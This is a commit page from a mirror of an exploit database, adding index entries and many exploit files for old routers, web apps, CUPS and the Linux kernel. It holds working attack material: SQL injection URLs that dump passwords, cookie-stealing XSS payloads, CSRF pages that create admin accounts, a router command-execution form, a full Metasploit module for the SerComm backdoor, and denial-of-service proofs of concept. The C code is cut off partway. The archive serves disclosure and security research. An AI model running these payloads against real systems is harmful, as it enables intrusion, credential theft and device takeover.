bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 01_16_2014

Browse source
This commit is contained in:
Offensive Security 2014-01-16 04:20:47 +00:00
parent f3449cbaca
commit fc1d5b0b00
58 changed files with 2768 additions and 147 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

55
files.csv
View file

@ -27571,6 +27571,7 @@ id,file,description,date,author,platform,type,port
30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
30726,platforms/hardware/webapps/30726.2013-6922,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
30728,platforms/linux/remote/30728.txt,"Yarssr 0.2.2 GUI.PM Remote Code Injection Vulnerability",2007-10-31,"Duncan Gilmore",linux,remote,0
30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0
30730,platforms/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote,0
30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 Index.PHP Local File Include Vulnerability",2007-11-01,KiNgOfThEwOrLd,php,webapps,0
@ -27615,10 +27616,13 @@ id,file,description,date,author,platform,type,port
30770,platforms/cgi/webapps/30770.txt,"AIDA Web Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0
30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller Screens Directory HTML Injection Vulnerability",2007-11-15,"Jan Fry",multiple,remote,0
30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0
30773,platforms/windows/dos/30773.txt,"Microsoft Jet Database Engine MDB File Parsing Remote Buffer Overflow Vulnerability",2007-11-16,cocoruder,windows,dos,0
30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script Cross-Site Scripting Vulnerability",2007-11-16,"Adrian Pastor",php,webapps,0
30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 Login.ASP Multiple SQL Injection Vulnerabilities",2007-11-17,"Aria-Security Team",asp,webapps,0
30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 ParseRTSPRequestString Remote Denial Of Service Vulnerability",2007-11-19,"Luigi Auriemma",linux,dos,0
30777,platforms/cgi/webapps/30777.txt,"Citrix NetScaler 8.0 build 47.8 Generic_API_Call.PL Cross-Site Scripting Vulnerability",2007-11-19,nnposter,cgi,webapps,0
30778,platforms/asp/webapps/30778.txt,"Click&BaneX Details.ASP SQL Injection Vulnerability",2007-11-19,"Aria-Security Team",asp,webapps,0
30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d Long Vehicle Name Buffer Overflow Vulnerability",2007-11-19,"Luigi Auriemma",multiple,dos,0
30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0
30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0
30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow Exploit",2014-01-07,Mr.XHat,windows,local,0
@ -27627,6 +27631,7 @@ id,file,description,date,author,platform,type,port
30788,platforms/windows/local/30788.rb,"IcoFX Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0
30789,platforms/windows/local/30789.rb,"IBM Forms Viewer Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0
30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80
30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 Multiple Remote Denial Of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0
30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.PHP Backdoor Vulnerability",2007-11-21,D4m14n,php,webapps,0
30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer 'default.asp' SQL Injection Vulnerability",2007-11-21,"Aria-Security Team",asp,webapps,0
30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 'default.asp' SQL Injection Vulnerability",2007-11-21,The-0utl4w,asp,webapps,0
@ -27672,6 +27677,7 @@ id,file,description,date,author,platform,type,port
30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability",2007-11-10,"Adrian Pastor",hardware,remote,0
30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0
30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.PHP SQL Injection Vulnerability",2007-11-30,Lostmon,php,webapps,0
30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service Vulnerability",2007-11-30,TeLeMan,linux,dos,0
30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x,Firefox 1.5.0.x/2.0.x JavaScript Multiple Fields Key Filtering Vulnerability",2007-12-01,"Carl Hardwick",multiple,remote,0
30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 daemon_start Local Privilege Escalation Vulnerability",2007-12-03,"Bas van Schaik",linux,local,0
30840,platforms/windows/dos/30840.txt,"SonicWALL Global VPN Client 4.0.782 Remote Format String Vulnerability",2007-12-04,"SEC Consult",windows,dos,0
@ -27684,11 +27690,13 @@ id,file,description,date,author,platform,type,port
30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0
30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
30850,platforms/multiple/remote/30850.txt,"HFS HTTP File Server 2.2/2.3 Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0
30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0
30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0
30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0
30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 Clickstats.PHP Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0
30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 Multiple SQL Injection Vulnerabilities",2007-12-07,Chrysalid,asp,webapps,0
30856,platforms/multiple/dos/30856.txt,"Easy File Sharing Web Server 1.3x Directory Traversal and Multiple Information Disclosure Vulnerabilities",2007-12-07,"Luigi Auriemma",multiple,dos,0
30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 usergallery.php galleryID Parameter XSS",2007-12-10,Brainhead,php,webapps,0
30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 calendar.php Multiple Parameter XSS",2007-12-10,Brainhead,php,webapps,0
30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 Access Validation And Input Validation Vulnerabilities",2007-12-10,"Tomas Kuliavas",php,webapps,0
@ -27715,3 +27723,50 @@ id,file,description,date,author,platform,type,port
30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 Unauthorized Post Access Vulnerability",2007-12-15,"Michael Brooks",php,webapps,0
30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 Multiple Remote File Include Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0
30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0
30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0
30893,platforms/php/webapps/30893.txt,"PHP Security Framework Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0
30895,platforms/linux/remote/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 DNS Response Remote Denial of Service Vulnerability",2007-12-17,beSTORM,linux,remote,0
30896,platforms/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 Remote Denial of Service Vulnerability",2007-12-17,"Chris Castaldo",multiple,dos,0
30897,platforms/windows/remote/30897.html,"iMesh 7 'IMWebControl' ActiveX Control Code Execution Vulnerability",2007-12-17,rgod,windows,remote,0
30898,platforms/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP 'asn1_get_string()' Remote Buffer Overflow Vulnerability",2007-11-06,wei_wang,linux,dos,0
30899,platforms/php/webapps/30899.txt,"Mambo 4.6.2 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-12-18,"Beenu Arora",php,webapps,0
30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution Exploit",2014-01-14,"Arash Abedian",hardware,webapps,80
30901,platforms/windows/remote/30901.txt,"Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability",2007-12-19,"Maciej Piotr Falkiewicz",windows,remote,0
30902,platforms/linux/dos/30902.c,"Linux Kernel 2.6.22 IPv6 Hop-By-Hop Header Remote Denial of Service Vulnerability",2007-12-19,"Clemens Kurtenbach",linux,dos,0
30903,platforms/multiple/dos/30903.c,"id3lib ID3 Tags Buffer Overflow Vulnerability",2007-12-19,"Luigi Auriemma",multiple,dos,0
30905,platforms/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x main.swf baseurl Parameter asfunction: Protocol Handler XSS",2007-12-18,"Rich Cannings",multiple,remote,0
30906,platforms/multiple/dos/30906.c,"ProWizard 4 PC 1.62 Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",multiple,dos,0
30908,platforms/windows/remote/30908.txt,"SoapUI 4.6.3 - Remote Code Execution",2014-01-14,"Barak Tawily",windows,remote,0
30909,platforms/php/webapps/30909.html,"Auto Classifieds Script 2.0 - Add Admin CSRF Vulnerability",2014-01-14,"HackXBack ",php,webapps,80
30910,platforms/php/webapps/30910.txt,"PHPJabbers Job Listing Script - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80
30911,platforms/php/webapps/30911.txt,"PHPJabbers Appointment Scheduler 2.0 - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80
30912,platforms/php/webapps/30912.txt,"PHPJabbers Car Rental Script - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80
30913,platforms/php/webapps/30913.txt,"PHPJabbers Event Booking Calendar 2.0 - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80
30914,platforms/hardware/webapps/30914.txt,"Conceptronic Wireless Pan & Tilt Network Camera - CSRF Vulnerability",2014-01-14,"Felipe Molina",hardware,webapps,80
30915,platforms/hardware/remote/30915.rb,"SerComm Device Remote Code Execution",2014-01-14,metasploit,hardware,remote,32764
30916,platforms/php/webapps/30916.txt,"Burden 1.8 - Authentication Bypass",2014-01-14,"High-Tech Bridge SA",php,webapps,80
30917,platforms/php/webapps/30917.txt,"Horizon QCMS 4.0 - Multiple Vulnerabilities",2014-01-14,"High-Tech Bridge SA",php,webapps,80
30918,platforms/php/webapps/30918.txt,"iDevSpot iSupport 1.8 'index.php' Local File Include Vulnerability",2007-12-20,JuMp-Er,php,webapps,0
30919,platforms/cgi/webapps/30919.txt,"SiteScape Forum 'dispatch.cgi' Tcl Command Injection Vulnerability",2007-12-20,niekt0,cgi,webapps,0
30920,platforms/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",windows,remote,0
30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x 'view_entry.php' SQL Injection Vulnerability",2007-12-21,root@hanicker.it,php,webapps,0
30922,platforms/multiple/dos/30922.c,"WinUAE 1.4.4 'zfile.c' Stack-Based Buffer Overflow Vulnerability",2007-12-21,"Luigi Auriemma",multiple,dos,0
30923,platforms/php/webapps/30923.txt,"MyBlog 1.x Games.PHP ID Remote File Include Vulnerability",2007-12-22,"Beenu Arora",php,webapps,0
30924,platforms/php/webapps/30924.txt,"Dokeos 1.x forum/viewthread.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0
30925,platforms/php/webapps/30925.txt,"Dokeos 1.x forum/viewforum.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0
30926,platforms/php/webapps/30926.txt,"Dokeos 1.x work/work.php display_upload_form Action origin Parameter XSS",2007-12-22,Doz,php,webapps,0
30927,platforms/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 'loadadminpage' Parameter Remote File Include Vulnerability",2007-12-24,Koller,php,webapps,0
30928,platforms/php/remote/30928.php,"PDFlib 7.0.2 Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,php,remote,0
30929,platforms/php/webapps/30929.txt,"Logaholic update.php page Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0
30930,platforms/php/webapps/30930.txt,"Logaholic index.php parameter Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0
30931,platforms/php/webapps/30931.txt,"Logaholic index.php conf Parameter XSS",2007-12-24,malibu.r,php,webapps,0
30932,platforms/php/webapps/30932.txt,"Logaholic profiles.php newconfname Parameter XSS",2007-12-24,malibu.r,php,webapps,0
30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 Crafted ZPL File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0
30935,platforms/hardware/remote/30935.txt,"ZyXEL P-330W Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0
30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0
30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 'com_option' Parameter Cross-Site Scripting Vulnerability",2007-12-25,"Omer Singer",php,webapps,0
30938,platforms/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 'default.asp' Multiple SQL Injection Vulnerabilities",2007-12-24,bypass,asp,webapps,0
30939,platforms/windows/remote/30939.txt,"ImgSvr 0.6.21 Error Message Remote Script Execution Vulnerability",2007-12-26,anonymous,windows,remote,0
30940,platforms/asp/webapps/30940.txt,"IPortalX forum/login_user.asp Multiple Parameter XSS",2007-12-27,Doz,asp,webapps,0
30941,platforms/asp/webapps/30941.txt,"IPortalX blogs.asp Date Parameter XSS",2007-12-27,Doz,asp,webapps,0
30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0

Can't render this file because it is too large.

9
platforms/asp/webapps/30938.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27031/info
Web Sihirbazi is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect Web Sihirbazi 5.1.1; other versions may also be affected.
http://www.example.com/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user http://www.example.com/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user

11
platforms/asp/webapps/30940.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/27044/info
iPortalX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
All versions are considered vulnerable.
http://www.example.com/forum/login_user.asp?Redirect=/forum/search.asp@KW=%22%3E%3 Cscript%3Ealert(document.cookie);%3C/script%3E
http://www.example.com/forum/login_user.asp?Redirect=/members.asp?SF=%22%3E%3Cscri pt%3Ealert(document.cookie);%3C/script%3E

9
platforms/asp/webapps/30941.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27044/info
iPortalX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
All versions are considered vulnerable.
http://www.example.com/Path/blogs.asp?CID=0&AID=0&Date=%22%3E%3Cscript%3Ea lert(document.cookie);%3C/script%3E

8
platforms/cgi/webapps/30919.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/26963/info
SiteScape Forum is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input.
Attackers can exploit this issue to execute arbitrary commands in the context of the webserver process. Successful exploits could compromise the application and possibly the underlying system.
http://www.example.com/forum/support/dispatch.cgi/0;command

121
platforms/hardware/remote/30915.rb Executable file
View file

@ -0,0 +1,121 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerEcho
def initialize(info={})
super(update_info(info,
'Name' => "SerComm Device Remote Code Execution",
'Description' => %q{
This module will cause remote code execution on several SerComm devices.
These devices typically include routers from NetGear and Linksys.
Tested against NetGear DG834.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
],
'Payload' =>
{
'Space' => 10000, # Could be more, but this should be good enough
'DisableNops' => true
},
'Platform' => 'linux',
'Privileged' => false,
'Targets' =>
[
['Linux MIPS Big Endian',
{
'Arch' => ARCH_MIPSBE
}
],
['Linux MIPS Little Endian',
{
'Arch' => ARCH_MIPSLE
}
],
],
'DefaultTarget' => 0,
'References' =>
[
[ 'OSVDB', '101653' ],
[ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
],
'DisclosureDate' => "Dec 31 2013" ))
register_options(
[
Opt::RPORT(32764)
], self.class)
end
def check
fprint = endian_fingerprint
case fprint
when 'BE'
print_status("Detected Big Endian")
return Msf::Exploit::CheckCode::Vulnerable
when 'LE'
print_status("Detected Little Endian")
return Msf::Exploit::CheckCode::Vulnerable
end
return Msf::Exploit::CheckCode::Unknown
end
def exploit
execute_cmdstager(:noargs => true)
end
def endian_fingerprint
begin
connect
sock.put(rand_text(5))
res = sock.get_once
disconnect
if res && res.start_with?("MMcS")
return 'BE'
elsif res && res.start_with?("ScMM")
return 'LE'
end
rescue Rex::ConnectionError => e
print_error("Connection failed: #{e.class}: #{e}")
end
return nil
end
def execute_command(cmd, opts)
vprint_debug(cmd)
# Get the length of the command, for the backdoor's command injection
cmd_length = cmd.length
# 0x53634d4d => Backdoor code
# 0x07 => Exec command
# cmd_length => Length of command to execute, sent after communication struct
data = [0x53634d4d, 0x07, cmd_length].pack("VVV")
connect
# Send command structure followed by command text
sock.put(data+cmd)
disconnect
Rex.sleep(1)
end
end

27
platforms/hardware/remote/30935.txt Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/27024/info
ZyXEL P-330W 802.11g Secure Wireless Internet Sharing Router is prone to multiple cross-site scripting vulnerabilities and cross-site request-forgery vulnerabilities because it fails to properly sanitize user-supplied input. These issues affect the device's web-based administrative interface.
An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The attacker may leverage the cross-site request-forgery issues to perform actions in the context of a device administrator, which can compromise the device.
http://www.example.com:<router_port>/ping.asp?pingstr=â?<3F>><script>alert("M
erry Christams")</script>
The following cross-site request-forgery example was provided:
<html><head><title>Chirstmastime is Here</title></head><body>
<img
src="http://www.example.com:<router_port>/goform/formRmtMgt?webWanAccess
=ON&remoteMgtPort=80
80&pingWANEnabled=&upnpEnabled=&WANPassThru1=&WANPassThru2=&WANPassT
hru3=&
submit-url=%2Fremotemgt.asp" width="0" height="0">
<img
src="http://www.example.com:<router_port>/goform/formPasswordSetup?usern
ame=admin&newpass=santa_pw
&confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0"
height="0">
</body>
</html>

27
platforms/hardware/webapps/30900.html Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: [Feixun FWR-604H Wireless Router Remote Code Execution]
# Date: [2014-01-09]
# Exploit Author: [Arash Abedian
(http://www.exploit-db.com/author/?a=6187<http://www.exploit-db.com/author/?a=6187)>
)
# Vendor Homepage: [http://feixun.com.cn]
# Version: [Hardware Version 1.0, Firmware Build: 7642]
# Tested on: [Hardware Version 1.0, Firmware Build: 7642]
# Vulnerability Details:
Feixun FWR-604H 150Mbps Wireless N Router is vulnerable to Remote Code
Execution vulnerability(Hardware Version 1.0, Firmware Build: 7642, Vendor
website:feixun.com.cn). The web server don't authenticate user prior to
system level execution. As such an unauthenticated attacker can easily
remotely exploit the target using system_command parameter in diagnosis.asp
file.
<html>
<body>
Exploit Feixun FWR-604H
<FORM ACTION="http://192.168.1.1/diagnosis.asp" METHOD=POST>
<input type="hidden" name="doType" value="2">
Command: <input type="text" name="system_command">
<input type="hidden" name="diagnosisResult" value="">
<input type="submit" value="Exploit">
</FORM>
</body>
</html>

71
platforms/hardware/webapps/30914.txt Executable file
View file

@ -0,0 +1,71 @@
**General Details**
Affected Product: Conceptronic camera CIPCAMPTIWL
Tested Firmware: 21.37.2.49
Tested Web UI Firmware: 0.61.4.18
Assigned CVE: CVE-2013-7204
CVSSv2 Base Score: 5.8 (AV:N/AC:M/AU:N/C:P/I:P/A:N)
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Solution Status: Not Fixed
Vendor Notification Timeline:
- 23/12/2013: Contacting with technical support through their web
form http://www.conceptronic.net/supcon.php?action=init
- 23/12/2013: Contacting with general information email addres
(info@conceptronic.net) to inform about the vulnerability and request
suitable security or technical contact to send the complete details of
the CSRF.
- 25/12/2013: Contacting with public twitter accounts
@conceptronic and @conceptronic_es to request suitable security or
technical contact to send the complete details of the CSRF.
- 28/12/2013: Recontacting the technical support.
- 28/12/2013: Recontacting general information address
info@conceptronic.net.
- 02/01/2014: Trying to conntact with security@conceptronic.net y
vulnerabilities@conceptronic.net but they are non existent addresses.
- 03/01/2014: Involve Inteco CERT in the notification proccess.
- 08/01/2014: Inteco confirms that there is still no response from
Conceptronic.
None of the comunication atempts with the vendor received a response,
so I'm publishing the advisory to warn users and confirm the
vulnerability with you.
**Vulnerabilitty details**
The CSRF is present in the CGI formulary used to create and modify
users of the web interface of the camera (/set_users.cgi). This CSRF
would allow a malicious attacker to create users in the camera web
interface (including administrator users) if he is able to lure the
legitimate administrator of the camera to visit a web controlled by
the attacker.
An example of the process to exploit this vulnerability:
1- A webcam administrator is already logged in the camera web interface.
2- A malicious user knows it and send a link to this administrator
pointing to a web controlled by this attacker
(http://example.com/conceptronic_csrf.html). In this web, the attacker
placed an image with the following code:
<img alt="csrf image"
src="http://<victim_camera_server>/set_users.cgi?next_url=rebootme.htm&user1=attacker&pwd1=attacker&pri1=2&user2=&pwd2=&pri2=0&user3=&pwd3=&pri3=0&user4=&pwd4=&pri4=0&user5=&pwd5=&pri5=0&user6=&pwd6=&pri6=0&user7=&pwd7=&pri7=0&user8=&pwd8=&pri8=0">
3- The webcam administrator visit the link.
4- The page http://example.com/test_csrf.html tries to load the image
by making a GET request to the pointed URL, thus, making the
legitimate administrator to create a new user identified by "attacker"
and password "attacker".
A video was uploaded to youtube showing this behaviour:
https://www.youtube.com/watch?v=URXEe_VRc74
This issue can be fixed by adding an additional step to the user
creation CGI, either requesting the administrator password again
before creating/modifying any user or creating a hidden random token
for each form (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet)
--
Felipe Molina de la Torre

9
platforms/linux/dos/30776.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26488/info
LIVE555 Media Server is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input.
Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.
LIVE555 Media Server 2007.11.01 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/30776.zip

9
platforms/linux/dos/30837.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/26666/info
QEMU is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks when handling user-supplied input.
Attackers can exploit this issue to cause denial-of-service conditions. Given the nature of the issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
QEMU 0.9.0 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/30837.rar

50
platforms/linux/dos/30898.pl Executable file
View file

@ -0,0 +1,50 @@
source: http://www.securityfocus.com/bid/26917/info
Common UNIX Printing System (CUPS) is prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.
Exploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected software. Failed exploit attempts will likely result in denial-of-service conditions.
This issue affects CUPS 1.2 and 1.3, prior to 1.3.5; other versions may also be vulnerable.
P0C:
===
#!/usr/bin/perl
#if 0
# backend_snmp_poc.pl write by wei_wang@mcafee.com
# 2007-11-06
#
# snmp.c asn1_get_string integer overflow cups 1.3.4
#
# packet->error = "No community name";
# else if ((length = asn1_get_length(&bufptr, bufend)) == 0)
# packet->error = "Community name uses indefinite length";
# else
# {
# asn1_get_string(&bufptr, bufend, length, packet->community,
# sizeof(packet->community));
#
# if ((packet->request_type = asn1_get_type(&bufptr, bufend))
#
#002a: 30 38 tag=0x30 len=0x38
#002c: 02 01 00 version:1 (0)
#002f: 04 84 ff ff ff ff 69 63 community:public
#len is 0xffffffff
#endif
my $payload ="\x30\x38\x02\x01\x00\x04\x84\xff\xff\xff\xff\x41\x41";
use strict;
my $PF_INET=2;
my $SOCK_DGRAM=2;
my $port=161;
my $proto=getprotobyname('udp');
my $addres=pack('SnC4x8',$PF_INET,$port,0,0,0,0);
my ($Cmd);
socket(SOCKET,$PF_INET,$SOCK_DGRAM,$proto) or die "Can't build a socket";
bind (SOCKET,$addres);
while(1)
{
my $rip=recv (SOCKET,$Cmd,100,0);
send (SOCKET,$payload,0,$rip) or die "send false";
print "$Cmd";
}

150
platforms/linux/dos/30902.c Executable file
View file

@ -0,0 +1,150 @@
source: http://www.securityfocus.com/bid/26943/info
The Linux kernel is prone to a remote denial-of-service vulnerability because it fails to adequately validate specially crafted IPv6 'Hop-By-Hop' headers.
Attackers can exploit this issue to cause a kernel panic, denying service to legitimate users.
/*
* Clemens Kurtenbach <ckurtenbach at s21sec . com>
* PoC code for exploiting the jumbo bug found in
* linux kernels >=2.6.20 and <=2.6.21.1
* gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash
*
*/
/* io */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/* network */
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netdb.h>
#include <linux/if.h>
#define MY_FRAME_LEN 1145
char *resolve6(unsigned char *target) {
char *ret_addr;
struct in6_addr my_in6;
char *glob_addr = (char *) &my_in6;
struct addrinfo addr_hints, *addr_result;
unsigned char out[64];
memset(&addr_hints, 0, sizeof(addr_hints));
addr_hints.ai_family = AF_INET6;
if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) {
printf("getaddrinfo() error\n");
exit(1);
}
if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen,
out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){
printf("getnameinfo() error\n");
exit(1);
}
if(inet_pton(AF_INET6, out, glob_addr) < 0) {
printf("inet_pton() error\n");
exit(1);
}
if((ret_addr = malloc(16)) == NULL) {
printf("malloc() error\n");
exit(1);
}
memcpy(ret_addr, my_in6.s6_addr, 16);
return ret_addr;
}
int main(int argc, char *argv[]) {
if (argc < 4) {
printf("usage: ./ipv6_jumbo_crash <fe80::1:2:3>
<00:11:22:33:44:55> <eth0>\n");
exit(1);
}
/* handle IPv6 destination */
unsigned char *dest_ip = resolve6(argv[1]);
/* handle MAC */
unsigned char dest_mac[7];
